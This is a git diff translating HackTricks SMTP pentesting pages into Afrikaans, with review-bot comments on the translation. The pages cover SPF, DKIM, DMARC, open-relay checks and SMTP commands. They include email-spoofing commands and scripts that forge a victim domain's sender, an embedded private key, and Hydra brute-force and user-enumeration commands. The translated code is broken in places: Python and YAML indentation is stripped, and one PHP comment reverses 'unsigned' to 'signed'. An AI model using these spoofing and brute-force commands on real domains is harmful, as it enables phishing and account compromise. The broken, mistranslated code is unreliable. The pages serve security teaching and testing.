| -It's also possible to identify **Qualifiers** that indicates **what should be done if a mechanism is matched**. By default, the **qualifier "+"** is used (so if any mechanism is matched, that means it's allowed).\ -You usually will note **at the end of each SPF policy** something like: **\~all** or **-all**. This is used to indicate that **if the sender doesn't match any SPF policy, you should tag the email as untrusted (\~) or reject (-) the email.** +Dit is ook moontlik om **Kwalifiseerders** te identifiseer wat aandui **wat gedoen moet word as 'n meganisme ooreenstem**. Standaard word die **kwalifiseerder "+"** gebruik (so as enige meganisme ooreenstem, beteken dit dat dit toegelaat word).\ +Gewoonlik sal jy **aan die einde van elke SPF-beleid** iets soos **\~all** of **-all** sien. Dit word gebruik om aan te dui dat **as die afstuurder nie ooreenstem met enige SPF-beleid nie, jy die e-pos as onbetroubaar (\~) moet merk of die e-pos moet verwerp (-).** -#### Qualifiers +#### Kwalifiseerders -Each mechanism within the policy may be prefixed by one of four qualifiers to define the intended result: +Elke meganisme binne die beleid kan voorafgegaan word deur een van vier kwalifiseerders om die bedoelde resultaat te definieer: -* **`+`**: Corresponds to a PASS result. By default, mechanisms assume this qualifier, making `+mx` equivalent to `mx`. -* **`?`**: Represents a NEUTRAL result, treated similarly to NONE (no specific policy). -* **`~`**: Denotes SOFTFAIL, serving as a middle ground between NEUTRAL and FAIL. Emails meeting this result are typically accepted but marked accordingly. -* **`-`**: Indicates FAIL, suggesting that the email should be outright rejected. - -In the upcoming example, the **SPF policy of google.com** is illustrated. Note the inclusion of SPF policies from different domains within the first SPF policy: +* **`+`**: Kom ooreen met 'n SUKSES-resultaat. 
Standaard aanvaar meganismes hierdie kwalifiseerder, wat `+mx` gelykstaande maak aan `mx`. +* **`?`**: Verteenwoordig 'n NEUTRALE resultaat, wat op dieselfde wyse as GEEN (geen spesifieke beleid) hanteer word. +* **`~`**: Dui op SOFTFAIL, as 'n middeweg tussen NEUTRAAL en MISLUK. E-posse wat aan hierdie resultaat voldoen, word tipies aanvaar maar dienooreenkomstig gemerk. +* **`-`**: Dui op MISLUK, wat aandui dat die e-pos heeltemal verwerp moet word. +In die volgende voorbeeld word die **SPF-beleid van google.com** geïllustreer. Let op die insluiting van SPF-beleide van verskillende domeine binne die eerste SPF-beleid: ```shell-session dig txt google.com | grep spf google.com. 235 IN TXT "v=spf1 include:_spf.google.com ~all" 
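Review bot: In the hunk at `@@ -260,52 +373,50 @@` the REDIRECT table row loses its explanation: only "Die SPF-beleid van die domein wat in die omskakelingsmeganisme aangedui word, sal gebruik word." survives, while the original's first sentence (that a redirect points to another domain hosting an SPF policy so several domains can share one policy) is not translated. Two terminology problems in the same hunk change meaning: `redirect` is an SPF modifier keyword (RFC 7208) and should stay as `redirect` in both the INCLUDE row ("omskakelingsextensie") and the REDIRECT row, and "posdiensverskaffers" (mail service providers) is used for "mail servers" in the SPF intro and in the MX row, where the point is that the sender IP matches one of the domain's own MX hosts. Separately, the hint carried over from the original ("SPF is in 2014 'verouderd' geraak") is misleading as written: what RFC 7208 deprecated in 2014 is the dedicated SPF DNS record type (type 99), not SPF itself, which is why the hint goes on to say the policy now lives in a TXT record on `domain.com`. Suggest wording the translated hint to say the SPF record type, not SPF, was deprecated.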
@@ -324,31 +435,27 @@ _netblocks2.google.com. 1908 IN TXT "v=spf1 ip6:2001:4860:4000::/36 dig txt _netblocks3.google.com | grep spf _netblocks3.google.com. 1903 IN TXT "v=spf1 ip4:172.217.0.0/19 ip4:172.217.32.0/20 ip4:172.217.128.0/19 ip4:172.217.160.0/20 ip4:172.217.192.0/19 ip4:172.253.56.0/21 ip4:172.253.112.0/20 ip4:108.177.96.0/19 ip4:35.191.0.0/16 ip4:130.211.0.0/22 ~all" ``` +Tradisioneel was dit moontlik om enige domeinnaam te vervals wat nie 'n korrekte/geen SPF-rekord gehad het nie. **Vandag**, as 'n **e-pos** afkomstig is van 'n **domein sonder 'n geldige SPF-rekord**, sal dit waarskynlik **automaties afgekeur/gemerk word as onbetroubaar**. -Traditionally it was possible to spoof any domain name that didn't have a correct/any SPF record. **Nowadays**, if **email** comes from a **domain without a valid SPF record** is probably going to be **rejected/marked as untrusted automatically**. - -To check the SPF of a domain you can use online tools like: [https://www.kitterman.com/spf/validate.html](https://www.kitterman.com/spf/validate.html) +Om die SPF van 'n domein te kontroleer, kan jy aanlynhulpmiddels soos [https://www.kitterman.com/spf/validate.html](https://www.kitterman.com/spf/validate.html) gebruik. ### DKIM (DomainKeys Identified Mail) -DKIM is utilized to sign outbound emails, allowing their validation by external Mail Transfer Agents (MTAs) through the retrieval of the domain's public key from DNS. This public key is located in a domain's TXT record. To access this key, one must know both the selector and the domain name. +DKIM word gebruik om uitgaande e-posse te onderteken, sodat hulle deur eksterne Mail Transfer Agents (MTA's) gevalideer kan word deur die ophaling van die domein se openbare sleutel uit DNS. Hierdie openbare sleutel word in 'n domein se TXT-rekord gevind. Om toegang tot hierdie sleutel te verkry, moet jy beide die selekteerder en die domeinnaam weet. -For instance, to request the key, the domain name and selector are essential. 
These can be found in the mail header `DKIM-Signature`, e.g., `d=gmail.com;s=20120113`. - -A command to fetch this information might look like: +Byvoorbeeld, om die sleutel aan te vra, is die domeinnaam en selekteerder noodsaaklik. Hierdie kan gevind word in die e-poskop 'DKIM-Signature', bv. `d=gmail.com;s=20120113`. +'n Opdrag om hierdie inligting op te haal kan so lyk: ```bash dig 20120113._domainkey.gmail.com TXT | grep p= # This command would return something like: 20120113._domainkey.gmail.com. 280 IN TXT "k=rsa\; p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1Kd87/UeJjenpabgbFwh+eBCsSTrqmwIYYvywlbhbqoo2DymndFkbjOVIPIldNs/m40KF+yzMn1skyoxcTUGCQs8g3 ``` - ### DMARC (Domain-based Message Authentication, Reporting & Conformance) -DMARC enhances email security by building on SPF and DKIM protocols. It outlines policies that guide mail servers in the handling of emails from a specific domain, including how to deal with authentication failures and where to send reports about email processing actions. - -**To obtain the DMARC record, you need to query the subdomain \_dmarc** +DMARC verbeter e-possekuriteit deur voort te bou op die SPF- en DKIM-protokolle. Dit stel beleide op wat posbedieners lei in die hantering van e-posse van 'n spesifieke domein, insluitend hoe om te werk met verifikasiefoute en waar om verslae oor e-posverwerkingstake te stuur. +**Om die DMARC-rekord te verkry, moet jy die subdomein \_dmarc ondervra** ```bash # Reject dig _dmarc.facebook.com txt | grep DMARC 
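Review bot: In the hunk at `@@ -324,31 +435,27 @@` the `DKIM-Signature` header name loses its code formatting ("in die e-poskop 'DKIM-Signature'" with plain single quotes where the original has backticks); keep it as `` `DKIM-Signature` `` since it is a literal header field, not prose. The same hunk also removes the blank line between prose and the following ```` ```bash ```` fences (before the `dig 20120113._domainkey.gmail.com TXT` and `dig _dmarc.facebook.com txt` blocks), which is inconsistent with the rest of the file; restore the blank lines.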
@@ -362,79 +469,70 @@ _dmarc.google.com. 300 IN TXT "v=DMARC1; p=quarantine; rua=mailto:mailauth-repor dig _dmarc.bing.com txt | grep DMARC _dmarc.bing.com. 3600 IN TXT "v=DMARC1; p=none; pct=100; rua=mailto:BingEmailDMARC@microsoft.com;" ``` +#### DMARC-etikette -#### DMARC tags +| Etiketnaam | Doel | Voorbeeld | +| ---------- | --------------------------------------------- | ------------------------------- | +| v | Protokolverise | v=DMARC1 | +| pct | Persentasie van boodskappe wat gefiltreer word | pct=20 | +| ruf | Verslagdoenings-URI vir forensiese verslae | ruf=mailto:authfail@example.com | +| rua | Verslagdoenings-URI van saamgestelde verslae | rua=mailto:aggrep@example.com | +| p | Beleid vir organisatoriese domein | p=quarantine | +| sp | Beleid vir subdomeine van die OD | sp=reject | +| adkim | Uitlyningmodus vir DKIM | adkim=s | +| aspf | Uitlyningmodus vir SPF | aspf=r | -| Tag Name | Purpose | Sample | -| -------- | --------------------------------------------- | ------------------------------- | -| v | Protocol version | v=DMARC1 | -| pct | Percentage of messages subjected to filtering | pct=20 | -| ruf | Reporting URI for forensic reports | ruf=mailto:authfail@example.com | -| rua | Reporting URI of aggregate reports | rua=mailto:aggrep@example.com | -| p | Policy for organizational domain | p=quarantine | -| sp | Policy for subdomains of the OD | sp=reject | -| adkim | Alignment mode for DKIM | adkim=s | -| aspf | Alignment mode for SPF | aspf=r | +### **Wat van Subdomeine?** -### **What about Subdomains?** +**Van** [**hier**](https://serverfault.com/questions/322949/do-spf-records-for-primary-domain-apply-to-subdomains)**.**\ +Jy moet afsonderlike SPF-rekords hê vir elke subdomein waarvandaan jy e-pos wil stuur.\ +Die volgende is oorspronklik geplaas op openspf.org, wat vroeër 'n goeie bron vir hierdie soort dinge was. 
-**From** [**here**](https://serverfault.com/questions/322949/do-spf-records-for-primary-domain-apply-to-subdomains)**.**\ -You need to have separate SPF records for each subdomain you wish to send mail from.\ -The following was originally posted on openspf.org, which used to be a great resource for this kind of thing. - -> The Demon Question: What about subdomains? +> Die Demon-vraag: Wat van subdomeine? > -> If I get mail from pielovers.demon.co.uk, and there's no SPF data for pielovers, should I go back one level and test SPF for demon.co.uk? No. Each subdomain at Demon is a different customer, and each customer might have their own policy. It wouldn't make sense for Demon's policy to apply to all its customers by default; if Demon wants to do that, it can set up SPF records for each subdomain. +> As ek e-pos van pielovers.demon.co.uk kry en daar is geen SPF-data vir pielovers nie, moet ek dan een vlak terug gaan en SPF vir demon.co.uk toets? Nee. Elke subdomein by Demon is 'n ander kliënt, en elke kliënt kan sy eie beleid hê. Dit sou nie sin maak vir Demon se beleid om standaard op al sy kliënte van toepassing te wees nie; as Demon dit wil doen, kan dit SPF-rekords vir elke subdomein opstel. > -> So the advice to SPF publishers is this: you should add an SPF record for each subdomain or hostname that has an A or MX record. +> Die advies aan SPF-uitgewers is dus: jy moet 'n SPF-rekord vir elke subdomein of gasheernaam wat 'n A- of MX-rekord het, byvoeg. > -> Sites with wildcard A or MX records should also have a wildcard SPF record, of the form: \* IN TXT "v=spf1 -all" +> Webwerwe met wildekaart-A- of MX-rekords moet ook 'n wildekaart SPF-rekord hê, van die vorm: \* IN TXT "v=spf1 -all" -This makes sense - a subdomain may very well be in a different geographical location and have a very different SPF definition. +Dit maak sin - 'n subdomein kan heeltemal in 'n ander geografiese ligging wees en 'n baie ander SPF-definisie hê. 
-### **Open Relay** +### **Oop Relais** -When emails are sent, ensuring they don't get flagged as spam is crucial. This is often achieved through the use of a **relay server that is trusted by the recipient**. However, a common challenge is that administrators might not be fully aware of which **IP ranges are safe to allow**. This lack of understanding can lead to mistakes in setting up the SMTP server, a risk frequently identified in security assessments. - -A workaround that some administrators use to avoid email delivery issues, especially concerning communications with potential or ongoing clients, is to **allow connections from any IP address**. This is done by configuring the SMTP server's `mynetworks` parameter to accept all IP addresses, as shown below: +Wanneer e-posse gestuur word, is dit belangrik om te verseker dat hulle nie as spam geïdentifiseer word nie. Dit word dikwels bereik deur die gebruik van 'n **relaisbediener wat deur die ontvanger vertrou word**. Tog is 'n algemene uitdaging dat administrateurs dalk nie ten volle bewus is van watter **IP-reekse veilig is om toe te laat nie**. Hierdie gebrek aan begrip kan lei tot foute in die opstel van die SMTP-bediener, 'n risiko wat gereeld geïdentifiseer word in sekuriteitsassesserings. +'n Omweg wat sommige administrateurs gebruik om e-posleweringprobleme te vermy, veral met betrekking tot kommunikasie met potensiële of lopende kliënte, is om **verbinding vanaf enige IP-adres toe te laat**. Dit word gedoen deur die `mynetworks`-parameter van die SMTP-bediener te konfigureer om alle IP-adresse te aanvaar, soos hieronder gewys: ```bash mynetworks = 0.0.0.0/0 ``` - -For checking whether a mail server is an open relay (which means it could forward email from any external source), the `nmap` tool is commonly used. It includes a specific script designed to test this. 
The command to conduct a verbose scan on a server (for example, with IP 10.10.10.10) on port 25 using `nmap` is: - +Om te bepaal of 'n posdiens 'n oop relê is (wat beteken dat dit e-pos van enige eksterne bron kan deurstuur), word die `nmap`-instrument gewoonlik gebruik. Dit sluit 'n spesifieke skrips in wat ontwerp is om dit te toets. Die opdrag om 'n uitvoerige skandering op 'n bediener uit te voer (byvoorbeeld met IP 10.10.10.10) op poort 25 met behulp van `nmap` is: ```bash nmap -p25 --script smtp-open-relay 10.10.10.10 -v ``` +### **Gereedskap** +* [**https://github.com/serain/mailspoof**](https://github.com/serain/mailspoof) **Kyk vir SPF- en DMARC-misconfigurations** +* [**https://pypi.org/project/checkdmarc/**](https://pypi.org/project/checkdmarc/) **Kry outomaties SPF- en DMARC-configs** -### **Tools** - -* [**https://github.com/serain/mailspoof**](https://github.com/serain/mailspoof) **Check for SPF and DMARC misconfigurations** -* [**https://pypi.org/project/checkdmarc/**](https://pypi.org/project/checkdmarc/) **Automatically get SPF and DMARC configs** - -### Send Spoof Email +### Stuur Spoof E-pos * [**https://www.mailsploit.com/index**](https://www.mailsploit.com/index) * [**http://www.anonymailer.net/**](http://www.anonymailer.net) * [**https://emkei.cz/**](https://emkei.cz/) -**Or you could use a tool:** +**Of jy kan 'n instrument gebruik:** * [**https://github.com/magichk/magicspoofing**](https://github.com/magichk/magicspoofing) - ```bash # This will send a test email from test@victim.com to destination@gmail.com python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com # But you can also modify more options of the email python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com --subject TEST --sender administrator@victim.com ``` - {% hint style="warning" %} -If you get any **error using in the dkim python lib** parsing the key feel free to use this following one.\ -**NOTE**: This is just a dirty fix to do quick checks in cases 
where for some reason the openssl private key **cannot be parsed by dkim**. - +As jy enige **fout kry by die gebruik van die dkim python-biblioteek** om die sleutel te ontled, voel vry om hierdie volgende een te gebruik.\ +**NOTA**: Dit is net 'n vinnige oplossing om vinnige kontroles te doen in gevalle waar die openssl privaatsleutel **nie deur dkim ontled kan word nie**. ``` -----BEGIN RSA PRIVATE KEY----- MIICXgIBAAKBgQDdkohAIWT6mXiHpfAHF8bv2vHTDboN2dl5pZKG5ZSHCYC5Z1bt @@ -454,12 +552,12 @@ K9B7U1w0CJFUk6+4Qutr2ROqKtNOff9KuNRLAOiAzH3ZbQ== ``` {% endhint %} -**Or you could do it manually:** +**Of jy kan dit ook handmatig doen:** {% tabs %} {% tab title="PHP" %} -
# This will send an unsigned message
-mail("your_email@gmail.com", "Test Subject!", "hey! This is a test", "From: administrator@victim.com");
+
# Dit sal 'n ondertekende boodskap stuur
+mail("jou_email@gmail.com", "Toets onderwerp!", "hallo! Dit is 'n toets", "Van: administrator@slagoffer.com");
 
{% endtab %} @@ -480,10 +578,10 @@ sender="administrator@victim.com" subject="Test" message_html=""" - -

This is a test, not a scam

-
- + +

This is a test, not a scam

+
+ """ sender_domain=sender.split("@")[1] @@ -496,7 +594,7 @@ os.system("systemctl restart postfix") dkim_private_key_path="dkimprivatekey.pem" os.system(f"openssl genrsa -out {dkim_private_key_path} 1024 2> /dev/null") with open(dkim_private_key_path) as fh: - dkim_private_key = fh.read() +dkim_private_key = fh.read() # Generate email msg = MIMEMultipart("alternative") 
@@ -522,110 +620,106 @@ s.sendmail(sender, [destination], msg_data) {% endtab %} {% endtabs %} -### **More info** +### **Meer inligting** -**Find more information about these protections in** [**https://seanthegeek.net/459/demystifying-dmarc/**](https://seanthegeek.net/459/demystifying-dmarc/) +**Vind meer inligting oor hierdie beskermings in** [**https://seanthegeek.net/459/demystifying-dmarc/**](https://seanthegeek.net/459/demystifying-dmarc/) -### **Other phishing indicators** +### **Ander hengelindikators** -* Domain’s age -* Links pointing to IP addresses -* Link manipulation techniques -* Suspicious (uncommon) attachments -* Broken email content -* Values used that are different to those of the mail headers -* Existence of a valid and trusted SSL certificate -* Submission of the page to web content filtering sites +* Ouderdom van die domein +* Skakels wat na IP-adresse wys +* Skakel manipulasie tegnieke +* Verdagte (ongewone) aanhegsels +* Gebreekte e-pos inhoud +* Waardes wat verskil van die poskoppe +* Bestaan van 'n geldige en vertroude SSL-sertifikaat +* Indiening van die bladsy by webinhoudsfiltering-sites -## Exfiltration through SMTP +## Uitlekking deur SMTP -**If you can send data via SMTP** [**read this**](../../generic-methodologies-and-resources/exfiltration.md#smtp)**.** +**As jy data via SMTP kan stuur** [**lees hierdie**](../../generic-methodologies-and-resources/exfiltration.md#smtp)**.** -## Config file +## Konfigurasie lêer ### Postfix -Usually, if installed, in `/etc/postfix/master.cf` contains **scripts to execute** when for example a new mail is receipted by a user. For example the line `flags=Rq user=mark argv=/etc/postfix/filtering-f ${sender} -- ${recipient}` means that `/etc/postfix/filtering` will be executed if a new mail is received by the user mark. - -Other config files: +Gewoonlik bevat `/etc/postfix/master.cf`, as dit geïnstalleer is, **skripte om uit te voer** wanneer byvoorbeeld 'n nuwe e-pos deur 'n gebruiker ontvang word. 
Byvoorbeeld die lyn `flags=Rq user=mark argv=/etc/postfix/filtering-f ${sender} -- ${recipient}` beteken dat `/etc/postfix/filtering` uitgevoer sal word as 'n nuwe e-pos deur die gebruiker mark ontvang word. +Ander konfigurasie lêers: ``` sendmail.cf submit.cf ``` - -## References +## Verwysings * [https://research.nccgroup.com/2015/06/10/username-enumeration-techniques-and-their-value/](https://research.nccgroup.com/2015/06/10/username-enumeration-techniques-and-their-value/) * [https://www.reddit.com/r/HowToHack/comments/101it4u/what_could_hacker_do_with_misconfigured_smtp/](https://www.reddit.com/r/HowToHack/comments/101it4u/what_could_hacker_do_with_misconfigured_smtp/) -## HackTricks Automatic Commands - +## HackTricks Outomatiese Opdragte ``` Protocol_Name: SMTP #Protocol Abbreviation if there is one. Port_Number: 25,465,587 #Comma separated if there is more than one. Protocol_Description: Simple Mail Transfer Protocol #Protocol Abbreviation Spelled out Entry_1: - Name: Notes - Description: Notes for SMTP - Note: | - SMTP (Simple Mail Transfer Protocol) is a TCP/IP protocol used in sending and receiving e-mail. However, since it is limited in its ability to queue messages at the receiving end, it is usually used with one of two other protocols, POP3 or IMAP, that let the user save messages in a server mailbox and download them periodically from the server. +Name: Notes +Description: Notes for SMTP +Note: | +SMTP (Simple Mail Transfer Protocol) is a TCP/IP protocol used in sending and receiving e-mail. However, since it is limited in its ability to queue messages at the receiving end, it is usually used with one of two other protocols, POP3 or IMAP, that let the user save messages in a server mailbox and download them periodically from the server. 
- https://book.hacktricks.xyz/pentesting/pentesting-smtp +https://book.hacktricks.xyz/pentesting/pentesting-smtp Entry_2: - Name: Banner Grab - Description: Grab SMTP Banner - Command: nc -vn {IP} 25 +Name: Banner Grab +Description: Grab SMTP Banner +Command: nc -vn {IP} 25 Entry_3: - Name: SMTP Vuln Scan - Description: SMTP Vuln Scan With Nmap - Command: nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 {IP} +Name: SMTP Vuln Scan +Description: SMTP Vuln Scan With Nmap +Command: nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 {IP} Entry_4: - Name: SMTP User Enum - Description: Enumerate uses with smtp-user-enum - Command: smtp-user-enum -M VRFY -U {Big_Userlist} -t {IP} +Name: SMTP User Enum +Description: Enumerate uses with smtp-user-enum +Command: smtp-user-enum -M VRFY -U {Big_Userlist} -t {IP} Entry_5: - Name: SMTPS Connect - Description: Attempt to connect to SMTPS two different ways - Command: openssl s_client -crlf -connect {IP}:465 &&&& openssl s_client -starttls smtp -crlf -connect {IP}:587 +Name: SMTPS Connect +Description: Attempt to connect to SMTPS two different ways +Command: openssl s_client -crlf -connect {IP}:465 &&&& openssl s_client -starttls smtp -crlf -connect {IP}:587 Entry_6: - Name: Find MX Servers - Description: Find MX servers of an organization - Command: dig +short mx {Domain_Name} +Name: Find MX Servers +Description: Find MX servers of an organization +Command: dig +short mx {Domain_Name} Entry_7: - Name: Hydra Brute Force - Description: Need Nothing - Command: hydra -P {Big_Passwordlist} {IP} smtp -V - +Name: Hydra Brute Force +Description: Need Nothing +Command: hydra -P {Big_Passwordlist} {IP} smtp -V + Entry_8: - Name: consolesless mfs enumeration - Description: SMTP enumeration without the need to run msfconsole - Note: sourced from https://github.com/carlospolop/legion - Command: msfconsole -q 
-x 'use auxiliary/scanner/smtp/smtp_version; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_ntlm_domain; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_relay; set RHOSTS {IP}; set RPORT 25; run; exit' +Name: consolesless mfs enumeration +Description: SMTP enumeration without the need to run msfconsole +Note: sourced from https://github.com/carlospolop/legion +Command: msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_version; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_ntlm_domain; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_relay; set RHOSTS {IP}; set RPORT 25; run; exit' ``` -
-**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. +**Onmiddellik beskikbare opset vir kwesbaarheidsassessering en penetrasietoetsing**. Voer 'n volledige penetrasietoets uit van enige plek met 20+ gereedskap en funksies wat strek van verkenningswerk tot verslagdoening. Ons vervang nie penetrasietoetsers nie - ons ontwikkel aangepaste gereedskap, opsporings- en uitbuitingsmodules om hulle tyd te bespaar om dieper te graaf, skulpe te kraak en pret te hê. {% embed url="https://pentest-tools.com/" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
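Review bot: The hunk at `@@ -522,110 +620,106 @@` strips all indentation from the `HackTricks Automatic Commands` block, which is YAML consumed by tooling (Entry_8 itself says "sourced from https://github.com/carlospolop/legion"). With `Entry_1:` followed by `Name: Notes` at the same column, `Entry_1` becomes a null value and `Name`/`Description`/`Command` become top-level keys that are then repeated for every entry, and the block scalar `Note: |` with its text at column 0 is a YAML parse error because block-scalar content must be indented past its key. The lines themselves are not translated, so the hunk is pure damage; restore the original two-space indentation for every `Name:`, `Description:`, `Note:` and `Command:` line and for the text under `Note: |`.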
diff --git a/network-services-pentesting/pentesting-smtp/smtp-commands.md b/network-services-pentesting/pentesting-smtp/smtp-commands.md index ee4d3a8df..b2ac389e4 100644 --- a/network-services-pentesting/pentesting-smtp/smtp-commands.md +++ b/network-services-pentesting/pentesting-smtp/smtp-commands.md @@ -1,82 +1,82 @@ -# SMTP - Commands +# SMTP - Opdragte
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. +**Onmiddellik beskikbare opset vir kwesbaarheidsassessering & penetrasietoetsing**. Voer 'n volledige pentest uit van enige plek met 20+ gereedskap en funksies wat strek van rekognisering tot verslagdoening. Ons vervang nie pentesters nie - ons ontwikkel aangepaste gereedskap, opsporings- en uitbuitingsmodules om hulle 'n bietjie tyd te gee om dieper te graaf, skulpe te kraak en pret te hê. {% embed url="https://pentest-tools.com/" %} -**Commands from:** [**https://serversmtp.com/smtp-commands/**](https://serversmtp.com/smtp-commands/) +**Opdragte vanaf:** [**https://serversmtp.com/smtp-commands/**](https://serversmtp.com/smtp-commands/) **HELO**\ -It’s the first SMTP command: is starts the conversation identifying the sender server and is generally followed by its domain name. +Dit is die eerste SMTP-opdrag: dit begin die gesprek deur die sender-bediener te identifiseer en word gewoonlik gevolg deur sy domeinnaam. **EHLO**\ -An alternative command to start the conversation, underlying that the server is using the Extended SMTP protocol. +'n Alternatiewe opdrag om die gesprek te begin, wat aandui dat die bediener die Uitgebreide SMTP-protokol gebruik. **MAIL FROM**\ -With this SMTP command the operations begin: the sender states the source email address in the “From” field and actually starts the email transfer. +Met hierdie SMTP-opdrag begin die operasies: die sender gee die bron-e-posadres in die "Van" veld aan en begin werklik die e-pos oordra. **RCPT TO**\ -It identifies the recipient of the email; if there are more than one, the command is simply repeated address by address. 
+Dit identifiseer die ontvanger van die e-pos; as daar meer as een is, word die opdrag eenvoudig adres vir adres herhaal. **SIZE**\ -This SMTP command informs the remote server about the estimated size (in terms of bytes) of the attached email. It can also be used to report the maximum size of a message to be accepted by the server. +Hierdie SMTP-opdrag gee die afgelewerde bediener inligting oor die geskatte grootte (in terme van bytes) van die gehegte e-pos. Dit kan ook gebruik word om die maksimum grootte van 'n boodskap wat deur die bediener aanvaar moet word, te rapporteer. **DATA**\ -With the DATA command the email content begins to be transferred; it’s generally followed by a 354 reply code given by the server, giving the permission to start the actual transmission. +Met die DATA-opdrag begin die oordrag van die e-posinhoud; dit word gewoonlik gevolg deur 'n 354 antwoordkode wat deur die bediener gegee word, wat die toestemming gee om die werklike oordrag te begin. **VRFY**\ -The server is asked to verify whether a particular email address or username actually exists. +Daar word aan die bediener gevra om te verifieer of 'n spesifieke e-posadres of gebruikersnaam werklik bestaan. **TURN**\ -This command is used to invert roles between the client and the server, without the need to run a new connaction. +Hierdie opdrag word gebruik om die rolle tussen die kliënt en die bediener om te keer, sonder om 'n nuwe verbinding te maak. **AUTH**\ -With the AUTH command, the client authenticates itself to the server, giving its username and password. It’s another layer of security to guarantee a proper transmission. +Met die AUTH-opdrag stel die kliënt homself aan die bediener bekend deur sy gebruikersnaam en wagwoord te gee. Dit is 'n ander laag van sekuriteit om 'n behoorlike oordrag te waarborg. **RSET**\ -It communicates the server that the ongoing email transmission is going to be terminated, though the SMTP conversation won’t be closed (like in the case of QUIT). 
+Dit deel die bediener mee dat die aan die gang gesette e-posoordrag beëindig gaan word, alhoewel die SMTP-gesprek nie sal sluit nie (soos in die geval van QUIT). **EXPN**\ -This SMTP command asks for a confirmation about the identification of a mailing list. +Hierdie SMTP-opdrag vra vir bevestiging oor die identifikasie van 'n poslys. **HELP**\ -It’s a client’s request for some information that can be useful for the a successful transfer of the email. +Dit is 'n versoek van die kliënt vir inligting wat nuttig kan wees vir die suksesvolle oordrag van die e-pos. **QUIT**\ -It terminates the SMTP conversation. +Dit beëindig die SMTP-gesprek.
